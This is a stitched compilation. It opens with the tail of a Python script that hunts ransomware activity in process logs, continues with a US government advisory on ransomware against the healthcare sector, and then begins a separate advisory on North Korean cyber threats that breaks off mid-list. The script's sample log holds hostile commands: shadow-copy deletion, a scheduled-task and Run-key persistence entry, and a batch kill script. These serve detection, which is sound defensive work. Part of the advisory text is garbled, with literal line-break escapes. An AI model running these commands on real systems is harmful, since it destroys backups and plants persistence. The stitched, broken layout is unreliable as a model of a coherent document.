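    timestamp, host, user, image, cmd = line.split("|", 4)
    return {"timestamp": timestamp, "host": host, "user": user, "image": image, "cmd": cmd}


def match_rules(cmd: str) -> List[Tuple[str, str]]:
    """Return (rule name, advisory reference) for every rule the command line trips."""
    return [(name, ref) for name, ref, pattern in RULES if pattern.search(cmd)]


def hunt_process_events(lines: Iterable[str]) -> List[Dict[str, str]]:
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        for name, ref in match_rules(event["cmd"]):
            findings.append({**event, "rule": name, "reference": ref})
    return findings


def hosts_with_recovery_inhibited(findings: List[Dict[str, str]]) -> Set[str]:
    """Shadow-copy deletion is the step right before encryption: isolate these hosts first."""
    return {f["host"] for f in findings if f["reference"].endswith("T1490")}


def sample_log() -> List[str]:
    """Constructed events, not real telemetry; hosts, users and paths are illustrative."""
    return [
        r"2020-10-28T02:10:11Z|WS-HR-07|CORP\jdoe|C:\Windows\explorer.exe|OUTLOOK.EXE",
        r"2020-10-28T02:11:40Z|WS-HR-07|CORP\jdoe|C:\Users\jdoe\AppData\Roaming\mfjdieks.exe|cmd.exe /c timeout 3 && del C:\Users\jdoe\Report-Review26-10.exe",
        r'2020-10-28T02:12:02Z|WS-HR-07|CORP\jdoe|C:\Users\jdoe\AppData\Roaming\mfjdieks.exe|schtasks /Create /TN "autoupdate#16876" /TR C:\Users\jdoe\AppData\Roaming\winapp\mfjdieks.exe /SC MINUTE /MO 15',
        r"2020-10-28T03:05:17Z|SRV-FILE01|CORP\backupsvc|C:\Windows\System32\cmd.exe|vssadmin list shadows",
        r"2020-10-29T01:40:09Z|SRV-FILE01|CORP\Administrator|C:\Windows\System32\cmd.exe|vssadmin Delete Shadows /all /quiet",
        r"2020-10-29T01:40:10Z|SRV-FILE01|CORP\Administrator|C:\Windows\System32\cmd.exe|vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB",
        r"2020-10-29T01:40:12Z|SRV-FILE01|CORP\Administrator|C:\Windows\System32\cmd.exe|reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v svc /t REG_SZ /d C:\Users\Public\svc.exe",
        r"2020-10-29T01:40:15Z|SRV-FILE01|CORP\Administrator|C:\Windows\System32\cmd.exe|cmd.exe /c C:\Users\Public\kill.bat",
    ]


if __name__ == "__main__":
    results = hunt_process_events(sample_log())
    for f in results:
        print(f["timestamp"], f["host"], f["rule"], "<-", f["reference"])
    print("isolate first:", sorted(hosts_with_recovery_inhibited(results)))
```

Note the deliberate negative case: `vssadmin list shadows` from a backup service account is routine and must not fire, which is why the two T1490 rules key on `delete shadows` and `resize shadowstorage` rather than on `vssadmin` alone. The TrickBot rules fire a day earlier on a workstation than the Ryuk rules do on the file server, which is the window the Recommended Mitigation Measures section describes: a TrickBot finding is the cue to back up and secure data before the shadow copies go.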
CISA, FBI, and HHS suggest HPH Sector organizations review or establish patching plans, security policies, user agreements, and business continuity plans to ensure they address current threats posed by malicious cyber actors.\n\n#### Network Best Practices\n\n * Patch operating systems, software, and firmware as soon as manufacturers release updates.\n * Check configurations for every operating system version for HPH organization-owned assets to prevent issues from arising that local users are unable to fix due to having local administration disabled.\n * Regularly change passwords to network systems and accounts and avoid reusing passwords for different accounts.\n * Use multi-factor authentication where possible.\n * Disable unused remote access/Remote Desktop Protocol (RDP) ports and monitor remote access/RDP logs.\n * Implement application and remote access allowlisting to only allow systems to execute programs known and permitted by the established security policy.\n * Audit user accounts with administrative privileges and configure access controls with least privilege in mind.\n * Audit logs to ensure new accounts are legitimate.\n * Scan for open or listening ports and remediate those that are not needed.\n * Identify critical assets such as patient database servers, medical records, and telehealth and telework infrastructure; create backups of these systems and house the backups offline from the network.\n * Implement network segmentation. Sensitive data should not reside on the same server and network segment as the email environment.\n * Set antivirus and anti-malware solutions to automatically update; conduct regular scans.\n\n#### Ransomware Best Practices\n\nCISA, FBI, and HHS do not recommend paying ransoms. Payment does not guarantee files will be recovered. It may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. 
In addition to implementing the above network best practices, the FBI, CISA and HHS also recommend the following:\n\n * Regularly back up data, air gap, and password protect backup copies offline.\n * Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, secure location.\n\n#### User Awareness Best Practices\n\n * Focus on awareness and training. Because end users are targeted, make employees and stakeholders aware of the threats\u2014such as ransomware and phishing scams\u2014and how they are delivered. Additionally, provide users training on information security principles and techniques as well as overall emerging cybersecurity risks and vulnerabilities.\n * Ensure that employees know who to contact when they see suspicious activity or when they believe they have been a victim of a cyberattack. This will ensure that the proper established mitigation strategy can be employed quickly and efficiently.\n\n#### Recommended Mitigation Measures\n\nSystem administrators who have indicators of a TrickBot network compromise should immediately take steps to back up and secure sensitive or proprietary data. TrickBot infections may be indicators of an imminent ransomware attack; system administrators should take steps to secure network devices accordingly. 
Upon evidence of a TrickBot infection, review DNS logs and use the `XOR` key of `0xB9` to decode `XOR` encoded DNS requests to reveal the presence of `Anchor_DNS`, and maintain and provide relevant logs.\n\n### GENERAL RANSOMWARE MITIGATIONS \u2014 HPH SECTOR\n\nThis section is based on CISA and Multi-State Information Sharing and Analysis Center (MS-ISAC)'s Joint Ransomware Guide, which can be found at <https://www.cisa.gov/publication/ransomware-guide>.\n\nCISA, FBI, and HHS recommend that healthcare organizations implement both ransomware prevention and ransomware response measures immediately.\n\n#### Ransomware Prevention\n\n#### _Join and Engage with Cybersecurity Organizations_\n\nCISA, FBI, and HHS recommend that healthcare organizations take the following initial steps:\n\n * Join a healthcare information sharing organization, H-ISAC: \n * Health Information Sharing and Analysis Center (H-ISAC): <https://h-isac.org/membership-account/join-h-isac/>\n * Sector-based ISACs - National Council of ISACs: <https://www.nationalisacs.org/member-isacs>\n * Information Sharing and Analysis Organization (ISAO) Standards Organization: <https://www.isao.org/information-sharing-groups/>\n * Engage with CISA and FBI, as well as HHS\u2014through the HHS Health Sector Cybersecurity Coordination Center (HC3)\u2014to build a lasting partnership and collaborate on information sharing, best practices, assessments, and exercises. 
\n * CISA: [cisa.gov](<cisa.gov>), <https://us-cert.cisa.gov/mailing-lists-and-feeds>, [central@cisa.gov](<central@cisa.gov>)\n * FBI: [ic3.gov](<ic3.gov>), [www.fbi.gov/contact-us/field](<www.fbi.gov/contact-us/field>), [CyWatch@fbi.gov](<CyWatch@fbi.gov>)\n * HHS/HC3: <http://www.hhs.gov/hc3>, [HC3@HHS.gov](<HC3@HHS.gov>)\n\nEngaging with the H-ISAC, ISAO, CISA, FBI, and HHS/HC3 will enable your organization to receive critical information and access to services to better manage the risk posed by ransomware and other cyber threats.\n\n#### _Follow Ransomware Best Practices_\n\nRefer to the best practices and references below to help manage the risk posed by ransomware and support your organization\u2019s coordinated and efficient response to a ransomware incident. Apply these practices to the greatest extent possible based on availability of organizational resources.\n\n * It is critical to maintain offline, encrypted backups of data and to regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline or in separated networks as many ransomware variants attempt to find and delete any accessible backups. Maintaining offline, current backups is most critical because there is no need to pay a ransom for data that is readily accessible to your organization. \n * Use the 3-2-1 rule as a guideline for backup practices. The rule states that three copies of all critical data are retained on at least two different types of media and at least one of them is stored offline.\n * Maintain regularly updated \u201cgold images\u201d of critical systems in the event they need to be rebuilt. 
This entails maintaining image \u201ctemplates\u201d that include a preconfigured operating system (OS) and associated software applications that can be quickly deployed to rebuild a system, such as a virtual machine or server.\n * Retain backup hardware to rebuild systems in the event rebuilding the primary system is not preferred. \n * Hardware that is newer or older than the primary system can present installation or compatibility hurdles when rebuilding from images.\n * Ensure all backup hardware is properly patched.\n * In addition to system images, applicable source code or executables should be available (stored with backups, escrowed, license agreement to obtain, etc.). It is more efficient to rebuild from system images, but some images will not install on different hardware or platforms correctly; having separate access to needed software will help in these cases.\n * Create, maintain, and exercise a basic cyber incident response plan and associated communications plan that includes response and notification procedures for a ransomware incident. 
    * Review available incident response guidance, such as CISA’s Technical Approaches to Uncovering and Remediating Malicious Activity: <https://us-cert.cisa.gov/ncas/alerts/aa20-245a>.
    * Help your organization better organize around cyber incident response.
    * Develop a cyber incident response plan.
    * The Ransomware Response Checklist, available in the [CISA and MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), serves as an adaptable, ransomware-specific annex to organizational cyber incident response or disruption plans.
    * Review and implement, as applicable, MITRE’s Medical Device Cybersecurity: Regional Incident Preparedness and Response Playbook (<https://www.mitre.org/sites/default/files/publications/pr-18-1550-Medical-Device-Cybersecurity-Playbook.pdf>).
    * Develop a risk management plan that maps critical health services and care to the necessary information systems; this will ensure that the incident response plan will contain the proper triage procedures.
    * Plan for the possibility of critical information systems being inaccessible for an extended period of time. This should include but not be limited to the following:
        * Print and properly store/protect hard copies of digital information that would be required for critical patient healthcare.
        * Plan for and periodically train staff to handle the re-routing of incoming/existing patients in an expedient manner if information systems were to abruptly and unexpectedly become unavailable.
        * Coordinate the potential for surge support with other healthcare facilities in the greater local area. This should include organizational leadership periodically meeting and collaborating with counterparts in the greater local area to create/update plans for their facilities to both abruptly send and receive a significant number of critical patients for immediate care. This may include the opportunity to re-route healthcare employees (and possibly some equipment) to provide care along with additional patients.
        * Consider the development of a second, air-gapped communications network that can provide a minimum standard of backup support for hospital operations if/when the primary network becomes unavailable.
        * Predefine network segments, IT capabilities, and other functionality that can either be quickly separated from the greater network or shut down entirely without impacting operations of the rest of the IT infrastructure.
        * Legacy devices should be identified and inventoried with highest priority and given special consideration during a ransomware event.
 * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for infection vectors including internet-facing vulnerabilities and misconfigurations; phishing; precursor malware infection; and third parties and managed service providers.
 * HHS/HC3 tracks ransomware that is targeting the HPH Sector; this information can be found at <http://www.hhs.gov/hc3>.

#### _Hardening Guidance_

 * The Food and Drug Administration provides multiple guidance documents regarding the hardening of healthcare and specifically medical devices, found here: <https://www.fda.gov/medical-devices/digital-health-center-excellence/cybersecurity>.
 * See [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for additional in-depth hardening guidance.

#### _Contact CISA for These No-Cost Resources_

 * Information sharing with CISA and MS-ISAC (for SLTT organizations) includes bi-directional sharing of best practices and network defense information regarding ransomware trends and variants as well as malware that is a precursor to ransomware.
 * Policy-oriented or technical assessments help organizations understand how they can improve their defenses to avoid ransomware infection: <https://www.cisa.gov/cyber-resource-hub>.
    * Assessments include Vulnerability Scanning and Phishing Campaign Assessment.
 * Cyber exercises evaluate or help develop a cyber incident response plan in the context of a ransomware incident scenario.
 * CISA Cybersecurity Advisors (CSAs) advise on best practices and connect you with CISA resources to manage cyber risk.
 * Contacts:
    * SLTT organizations: [CyberLiaison_SLTT@cisa.dhs.gov](<CyberLiaison_SLTT@cisa.dhs.gov>)
    * Private sector organizations: [CyberLiaison_Industry@cisa.dhs.gov](<CyberLiaison_Industry@cisa.dhs.gov>)

#### _Ransomware Quick References_

 * _Ransomware: What It Is and What to Do About It_ (CISA): General ransomware guidance for organizational leadership and more in-depth information for CISOs and technical staff: <https://www.us-cert.cisa.gov/sites/default/files/publications/Ransomware_Executive_One-Pager_and_Technical_Document-FINAL.pdf>
 * Ransomware (CISA): Introduction to ransomware, notable links to CISA products on protecting networks, specific ransomware threats, and other resources: <https://www.us-cert.cisa.gov/Ransomware>
 * HHS/HC3: Ransomware that impacts HPH is tracked by the HC3 and can be found at [www.hhs.gov/hc3](<www.hhs.gov/hc3>)
 * _Security Primer – Ransomware_ (MS-ISAC): Outlines opportunistic and strategic ransomware campaigns, common infection vectors, and best practice recommendations: <https://www.cisecurity.org/white-papers/security-primer-ransomware/>
 * _Ransomware: Facts, Threats, and Countermeasures_ (MS-ISAC): Facts about ransomware, infection vectors, ransomware capabilities, and how to mitigate the risk of ransomware infection: <https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/>
 * HHS Ransomware Fact Sheet: <https://www.hhs.gov/sites/default/files/RansomwareFactSheet.pdf>
 * NIST Securing Data Integrity White Paper: <https://csrc.nist.gov/publications/detail/white-paper/2020/10/01/securing-data-integrity-against-ransomware-attacks/draft>

#### Ransomware Response Checklist

**Remember: Paying the ransom will not ensure your data is decrypted or that your systems or data will no longer be compromised. CISA, FBI, and HHS do not recommend paying ransom.**

Should your organization be a victim of ransomware, CISA strongly recommends responding by using the Ransomware Response Checklist located in [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>), which contains steps for detection and analysis as well as containment and eradication.

#### _Consider the Need for Extended Identification or Analysis_

If extended identification or analysis is needed, CISA, HHS/HC3, or federal law enforcement may be interested in any of the following information that your organization determines it can legally share:

 * Recovered executable file
 * Copies of the readme file – DO NOT REMOVE the file or decryption may not be possible
 * Live memory (RAM) capture from systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
 * Images of infected systems with additional signs of compromise (use of exploit toolkits, RDP activity, additional files found locally)
 * Malware samples
 * Names of any other malware identified on your system
 * Encrypted file samples
 * Log files (Windows Event Logs from compromised systems, firewall logs, etc.)
 * Any PowerShell scripts found to have executed on the systems
 * Any user accounts created in Active Directory or machines added to the network during the exploitation
 * Email addresses used by the attackers and any associated phishing emails
 * A copy of the ransom note
 * Ransom amount and whether or not the ransom was paid
 * Bitcoin wallets used by the attackers
 * Bitcoin wallets used to pay the ransom (if applicable)
 * Copies of any communications with attackers

Upon voluntary request, CISA can assist with analysis (e.g., phishing emails, storage media, logs, malware) at no cost to support your organization in understanding the root cause of an incident, even in the event additional remote assistance is not requested.

 * CISA – Advanced Malware Analysis Center: <https://www.malware.us-cert.gov/MalwareSubmission/pages/submission.jsf>
 * Remote Assistance – Request via [Central@cisa.gov](<Central@cisa.gov>)

### Contact Information

CISA, FBI, and HHS recommend identifying and having on hand the following contact information for ready use should your organization become a victim of a ransomware incident. Consider contacting these organizations for mitigation and response assistance or for purposes of notification.

 * State and Local Response Contacts
 * IT/IT Security Team – Centralized Cyber Incident Reporting
 * State and Local Law Enforcement
 * Fusion Center
 * Managed/Security Service Providers
 * Cyber Insurance

To report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI’s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by email at [CyWatch@fbi.gov](<CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact.
To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<Central@cisa.dhs.gov>).

Additionally, see [CISA and MS-ISAC's Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>) for information on contacting—and what to expect from contacting—federal asset response and federal threat response contacts.

### _Disclaimer_

This document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see <https://cisa.gov/tlp>.

### References

[CISA Emergency Services Sector Continuity Planning Suite](<https://www.cisa.gov/emergency-services-sector-continuity-planning-suite>)

[CISA MS-ISAC Joint Ransomware Guide](<https://www.cisa.gov/publication/ransomware-guide>)

[CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)

[FBI PSA: “High-Impact Ransomware Attacks Threaten U.S. Businesses and Organizations”](<https://www.ic3.gov/media/2019/191002.aspx>)

[Health Industry Cybersecurity Tactical Crisis Response](<https://healthsectorcouncil.org/hic-tcr/>)

[Health Industry Cybersecurity Practices (HICP)](<http://www.phe.gov/405d>)

[HHS - Ransomware Spotlight Webinar](<https://protect2.fireeye.com/url?k=661c55bd-3a495cae-661c6482-0cc47adb5650-bb09b09e1017f10b&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=99373fd9c7&e=7882426b51>)

[HHS - Health Industry Cybersecurity Practices: Managing Threats and Protecting Patients](<https://protect2.fireeye.com/url?k=b43c8fe1-e86986f2-b43cbede-0cc47adb5650-84218742b50e2b7e&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=3d453bb6fe&e=7882426b51>)

[HHS - Ransomware Briefing](<https://protect2.fireeye.com/url?k=6a477b44-36127257-6a474a7b-0cc47adb5650-f6c92a4c247070ec&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=071616ff3e&e=7882426b51>)

[HHS - Aggressive Ransomware Impacts](<https://protect2.fireeye.com/url?k=fe80c15e-a2d5c84d-fe80f061-0cc47adb5650-2206dbc55c13f1de&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=ebb762e019&e=7882426b51>)

[HHS - Ransomware Fact Sheet](<https://protect2.fireeye.com/url?k=2923cea5-7576c7b6-2923ff9a-0cc47adb5650-26d7a0932fe07e31&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=107ba38369&e=7882426b51>)

[HHS - Cyber Attack Checklist](<https://protect2.fireeye.com/url?k=08e10c16-54b40505-08e13d29-0cc47adb5650-70b9e6fd13ea4f2d&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=bcc423d21d&e=7882426b51>)

[HHS - Cyber-Attack Response Infographic](<https://protect2.fireeye.com/url?k=8497e505-d8c2ec16-8497d43a-0cc47adb5650-ba5cee20bcf28bab&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=dc2b43974c&e=7882426b51>)

[NIST - Data Integrity Publication](<https://protect2.fireeye.com/url?k=0be33d8b-57b63498-0be30cb4-0cc47adb5650-be7b920b52ab7927&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=c89bf12fa8&e=7882426b51>)

[NIST - Guide for Cybersecurity Event Recovery](<https://protect2.fireeye.com/url?k=5335b9d4-0f60b0c7-533588eb-0cc47adb5650-bbc2d82317c6bc45&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=eeb05487cf&e=7882426b51>)

[NIST - Identifying and Protecting Assets Against Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=348a7900-68df7013-348a483f-0cc47adb5650-5210c734b99339b1&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=9f0f789411&e=7882426b51>)

[NIST - Detecting and Responding to Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=daf6be91-86a3b782-daf68fae-0cc47adb5650-1f4f5f947a590fa0&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=958743a29c&e=7882426b51>)

[NIST - Recovering from Ransomware and Other Destructive Events](<https://protect2.fireeye.com/url?k=90b40d5e-cce1044d-90b43c61-0cc47adb5650-bab63aa79a2b0b2a&u=https://phe.us4.list-manage.com/track/click?u=f758a61addf9399176e6a0c3a&id=4947ff3a54&e=7882426b51>)

[Github List of IOCs](<https://gist.github.com/aaronst/6aa7f61246f53a8dd4befea86e832456>)

### Revisions

 * October 28, 2020: Initial version
 * October 29, 2020: Updated to include information on Conti, TrickBot, and BazarLoader, including new IOCs and Yara Rules for detection
 * November 2, 2020: Updated FBI link

Advisory AA20-302A, "Ransomware Activity Targeting the Healthcare and Public Health Sector" (published 2020-11-02): <https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a>

### Summary

The U.S. Departments of State, the Treasury, and Homeland Security, and the Federal Bureau of Investigation are issuing this advisory as a comprehensive resource on the North Korean cyber threat for the international community, network defenders, and the public. The advisory highlights the cyber threat posed by North Korea – formally known as the Democratic People’s Republic of Korea (DPRK) – and provides recommended steps to mitigate the threat. In particular, Annex 1 lists U.S. government resources related to DPRK cyber threats and Annex 2 includes a link to the UN 1718 Sanctions Committee (DPRK) Panel of Experts reports.

The DPRK’s malicious cyber activities threaten the United States and the broader international community and, in particular, pose a significant threat to the integrity and stability of the international financial system. Under the pressure of robust U.S. and UN sanctions, the DPRK has increasingly relied on illicit activities – including cybercrime – to generate revenue for its weapons of mass destruction and ballistic missile programs. In particular, the United States is deeply concerned about North Korea’s malicious cyber activities, which the U.S. government refers to as HIDDEN COBRA. The DPRK has the capability to conduct disruptive or destructive cyber activities affecting U.S. critical infrastructure. The DPRK also uses cyber capabilities to steal from financial institutions, and has demonstrated a pattern of disruptive and harmful cyber activity that is wholly inconsistent with the growing international consensus on what constitutes responsible State behavior in cyberspace.

The United States works closely with like-minded countries to focus attention on and condemn the DPRK’s disruptive, destructive, or otherwise destabilizing behavior in cyberspace. For example, in December 2017, Australia, Canada, New Zealand, the United States, and the United Kingdom publicly attributed the WannaCry 2.0 ransomware attack to the DPRK and denounced the DPRK’s harmful and irresponsible cyber activity. Denmark and Japan issued supporting statements for the joint denunciation of the destructive WannaCry 2.0 ransomware attack, which affected hundreds of thousands of computers around the world in May 2017.

It is vital for the international community, network defenders, and the public to stay vigilant and to work together to mitigate the cyber threat posed by North Korea.
[Click here](<https://www.us-cert.gov/sites/default/files/2020-04/DPRK_Cyber_Threat_Advisory_04152020_S508C.pdf>) for an English PDF version of this report.

Click the following links for PDF versions of this report in [Arabic](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_ARA_S508C.pdf>), [French](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_FRE_S508C.pdf>), Japanese, [Korean](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_KOR_S508C.pdf>), [Portuguese](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_POR_S508C.pdf>), [Spanish](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_SPA_S508C.pdf>), [traditional Chinese](<https://www.us-cert.gov/sites/default/files/publications/DPRK_Cyber_Advisory_TRAD CHN_S508C.pdf>), and Vietnamese.

### Technical Details

#### DPRK’s Malicious Cyber Activities Targeting the Financial Sector

Many DPRK cyber actors are subordinate to UN- and U.S.-designated entities, such as the Reconnaissance General Bureau. DPRK state-sponsored cyber actors primarily consist of hackers, cryptologists, and software developers who conduct espionage, cyber-enabled theft targeting financial institutions and digital currency exchanges, and politically motivated operations against foreign media companies. They develop and deploy a wide range of malware tools around the world to enable these activities and have grown increasingly sophisticated.
Common tactics to raise revenue illicitly by DPRK state-sponsored cyber actors include, but are not limited to:

**_Cyber-Enabled Financial Theft and Money Laundering._** The UN Security Council 1718 Committee Panel of Experts’ 2019 mid-term report (2019 POE mid-term report) states that the DPRK is increasingly able to generate revenue notwithstanding UN Security Council sanctions by using malicious cyber activities to steal from financial institutions through increasingly sophisticated tools and tactics. The 2019 POE mid-term report notes that, in some cases, these malicious cyber activities have also extended to laundering funds through multiple jurisdictions. The 2019 POE mid-term report mentions that it was investigating dozens of suspected DPRK cyber-enabled heists and that, as of late 2019, the DPRK has attempted to steal as much as $2 billion through these illicit cyber activities. Allegations in a March 2020 Department of Justice forfeiture complaint are consistent with portions of the POE’s findings. Specifically, the forfeiture complaint alleged how North Korean cyber actors used North Korean infrastructure in furtherance of their conspiracy to hack digital currency exchanges, steal hundreds of millions of dollars in digital currency, and launder the funds.

**_Extortion Campaigns._** DPRK cyber actors have also conducted extortion campaigns against third-country entities by compromising an entity’s network and threatening to shut it down unless the entity pays a ransom. In some instances, DPRK cyber actors have demanded payment from victims under the guise of long-term paid consulting arrangements in order to ensure that no such future malicious cyber activity takes place. DPRK cyber actors have also been paid to hack websites and extort targets for third-party clients.

**_Cryptojacking._** The 2019 POE mid-term report states that the POE is also investigating the DPRK’s use of “cryptojacking,” a scheme to compromise a victim machine and steal its computing resources to mine digital currency. The POE has identified several incidents in which computers infected with cryptojacking malware sent the mined assets – much of it anonymity-enhanced digital currency (sometimes also referred to as “privacy coins”) – to servers located in the DPRK, including at Kim Il Sung University in Pyongyang.

These activities highlight the DPRK’s use of cyber-enabled means to generate revenue while mitigating the impact of sanctions and show that any country can be exposed to and exploited by the DPRK. According to the 2019 POE mid-term report, the POE is also investigating such activities as attempted violations of UN Security Council sanctions on the DPRK.

#### Cyber Operations Publicly Attributed to DPRK by U.S. Government

The DPRK has repeatedly targeted U.S. and other government and military networks, as well as networks related to private entities and critical infrastructure, to steal data and conduct disruptive and destructive cyber activities. To date, the U.S. government has publicly attributed the following cyber incidents to DPRK state-sponsored cyber actors and co-conspirators:

 * **Sony Pictures.** In November 2014, DPRK state-sponsored cyber actors allegedly launched a cyber attack on Sony Pictures Entertainment (SPE) in retaliation for the 2014 film “The Interview.” DPRK cyber actors hacked into SPE’s network to steal confidential data, threatened SPE executives and employees, and damaged thousands of computers.
    * FBI’s Update on Sony Investigation (Dec. 19, 2014) <https://www.fbi.gov/news/pressrel/press-releases/update-on-sony-investigation>
    * DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>
 * **Bangladesh Bank Heist.** In February 2016, DPRK state-sponsored cyber actors allegedly attempted to steal at least $1 billion from financial institutions across the world and allegedly stole $81 million from the Bangladesh Bank through unauthorized transactions on the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. According to the complaint, DPRK cyber actors accessed the Bangladesh Bank’s computer terminals that interfaced with the SWIFT network after compromising the bank’s computer network via spear phishing emails targeting bank employees. DPRK cyber actors then sent fraudulently authenticated SWIFT messages directing the Federal Reserve Bank of New York to transfer funds out of the Bangladesh Bank’s Federal Reserve account to accounts controlled by the conspirators.
    * DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>
 * **WannaCry 2.0.** DPRK state-sponsored cyber actors developed the ransomware known as WannaCry 2.0, as well as two prior versions of the ransomware. In May 2017, WannaCry 2.0 ransomware infected hundreds of thousands of computers in hospitals, schools, businesses, and homes in over 150 countries. WannaCry 2.0 ransomware encrypts an infected computer’s data and allows the cyber actors to demand ransom payments in the Bitcoin digital currency. The Department of the Treasury designated one North Korean computer programmer for his part in the WannaCry 2.0 conspiracy, as well as his role in the Sony Pictures cyber attack and Bangladesh Bank heist, and additionally designated the organization he worked for.
    * CISA’s Technical Alert: Indicators Associated with WannaCry Ransomware (May 12, 2017) <https://www.us-cert.gov/ncas/alerts/TA17-132A>
    * White House Press Briefing on the Attribution of WannaCry Ransomware (Dec. 19, 2017) <https://www.whitehouse.gov/briefings-statements/press-briefing-on-the-attribution-of-the-wannacry-malware-attack-to-north-korea-121917/>
    * DOJ’s Criminal Complaint of a North Korean Regime-Backed Programmer (Sept. 6, 2018) <https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and>
    * Treasury Targets North Korea for Multiple Cyber-Attacks (Sept. 6, 2018) <https://home.treasury.gov/news/press-releases/sm473>
 * **FASTCash Campaign.** Since late 2016, DPRK state-sponsored cyber actors have employed a fraudulent ATM cash withdrawal scheme known as “FASTCash” to steal tens of millions of dollars from ATMs in Asia and Africa. FASTCash schemes remotely compromise payment switch application servers within banks to facilitate fraudulent transactions. In one incident in 2017, DPRK cyber actors enabled the withdrawal of cash simultaneously from ATMs located in more than 30 different countries. In another incident in 2018, DPRK cyber actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries.
    * CISA’s Alert on FASTCash Campaign (Oct. 2, 2018) <https://www.us-cert.gov/ncas/alerts/TA18-275A>
    * CISA’s Malware Analysis Report: FASTCash-Related Malware (Oct. 2, 2018) <https://www.us-cert.gov/ncas/analysis-reports/AR18-275A>
 * **Digital Currency Exchange Hack.** As detailed in allegations set forth in a Department of Justice complaint for forfeiture in rem, in April 2018, DPRK state-sponsored cyber actors hacked into a digital currency exchange and stole nearly $250 million worth of digital currency. The complaint further described how the stolen assets were laundered through hundreds of automated digital currency transactions, to obfuscate the origins of the funds, in an attempt to prevent law enforcement from tracing the assets. Two Chinese nationals are alleged in the complaint to have subsequently laundered the assets on behalf of the North Korean group, receiving approximately $91 million from DPRK-controlled accounts, as well as an additional $9.5 million from a hack of another exchange. In March 2020, the Department of the Treasury designated the two individuals under cyber and DPRK sanctions authorities, concurrent with a Department of Justice announcement that the individuals had been previously indicted on money laundering and unlicensed money transmitting charges and that 113 digital currency accounts were subject to forfeiture.
    * Treasury’s Sanctions against Individuals Laundering Cryptocurrency for Lazarus Group (March 2, 2020) <https://home.treasury.gov/news/press-releases/sm924>
    * DOJ’s Indictment of Two Chinese Nationals Charged with Laundering Cryptocurrency from Exchange Hack and Civil Forfeiture Complaint (March 2, 2020) <https://www.justice.gov/opa/pr/two-chinese-nationals-charged-laundering-over-100-million-cryptocurrency-exchange-hack>

### Mitigations

#### Measures to Counter the DPRK Cyber Threat

North Korea targets cyber-enabled infrastructure globally to generate revenue for its regime priorities, including its weapons of mass destruction programs.
We strongly urge governments, industry, civil society, and individuals to take all relevant actions below to protect themselves from and counter the DPRK cyber threat:

 * **Raise Awareness of the DPRK Cyber Threat.** Highlighting the gravity, scope, and variety of malicious cyber activities carried out by the DPRK will raise general awareness across the public and private sectors of the threat and promote adoption and implementation of appropriate preventive and risk mitigation measures.
